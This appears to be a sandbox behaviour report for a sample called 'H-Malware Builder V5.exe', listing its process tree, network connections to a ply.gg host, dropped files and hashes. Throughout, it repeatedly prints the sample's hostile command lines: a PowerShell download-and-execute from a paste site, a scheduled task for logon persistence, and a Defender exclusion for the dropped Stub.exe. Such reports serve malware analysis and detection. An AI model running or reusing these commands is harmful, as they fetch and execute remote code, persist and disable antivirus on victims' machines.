C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{70d723ce-e6bd-4950-9fe1-2e2241e936fd}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{4800c2ae-4e20-4a42-a492-53c1ef4aa299}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{46e9ec66-f01d-4b50-8228-0f4232b25ffe}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{b3f8c04c-1d58-43d8-9a48-b206af432c89}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{ce19208f-de68-474e-94ad-e735e64db202}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-863592726897148898831894185-1277618161-7568756241633545322623253798-327877081"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{14d33627-d1ae-41db-be42-508bcbf169f5}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{cb43fc64-4f0c-4fa7-b601-49b434df2292}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{0144143a-cdac-403f-bfa4-a54a9a82141b}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{038cfafb-53b7-4f59-a9f4-922764d0358a}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{0138412f-e62e-46db-bb62-ffaedbfbbd3f}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{30209252-4377-4358-8d2c-515bfbb97f40}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{c0506d7b-ea4c-420f-ab39-716b2cacecf7}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{220a36b9-3a5c-4e54-89f8-be232b9302a4}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{7cadd146-3d53-4cae-b16f-84850373a6f8}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{bd7d7a6b-8521-4a77-90ab-c47df246a9c6}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{c3db19d4-cfaf-474c-b450-816b71b64f6f}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{4e6f6a79-98a6-45cb-bb32-3d117b21fed8}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{a8f96154-f0fb-4d73-9bfd-6b1813fa20af}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{acc23d30-69dc-4502-8749-9b6569e1ad64}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | bay-helps.gl.at.ply.gg | udp |
| US | 147.185.221.18:36538 | bay-helps.gl.at.ply.gg | tcp |
| US | 147.185.221.18:36538 | bay-helps.gl.at.ply.gg | tcp |
| US | 147.185.221.18:36538 | bay-helps.gl.at.ply.gg | tcp |
| US | 147.185.221.18:36538 | bay-helps.gl.at.ply.gg | tcp |
| US | 147.185.221.18:36538 | bay-helps.gl.at.ply.gg | tcp |
| US | 147.185.221.18:36538 | bay-helps.gl.at.ply.gg | tcp |
Files
memory/2328-0-0x000007FEF56D3000-0x000007FEF56D4000-memory.dmp
memory/2328-1-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/2628-6-0x0000000002B50000-0x0000000002BD0000-memory.dmp
memory/2628-7-0x000000001B590000-0x000000001B872000-memory.dmp
memory/2628-8-0x0000000001F00000-0x0000000001F08000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
| MD5 | cc63633edfcc147cbaed1959b03d8730 |
| SHA1 | df7a250eba6ee1767b09f7923bfd735635deb9e8 |
| SHA256 | e699d9e9a81e9de82ce7ed645ef2a92ed6231e32cbc18a7e9ddff5c82623d417 |
| SHA512 | a584893714d46c6bdf4cc0a097b5f088a9aa49eea07b181745ca9b351b570c8ac3487bfe53a8a97213f5d8a7f71dbf4070ff92eab58b2ff7a4d0e784e17d02d4 |
memory/2444-14-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/2444-15-0x0000000000350000-0x000000000038E000-memory.dmp
memory/2444-16-0x00000000772C0000-0x0000000077469000-memory.dmp
memory/2444-17-0x00000000771A0000-0x00000000772BF000-memory.dmp
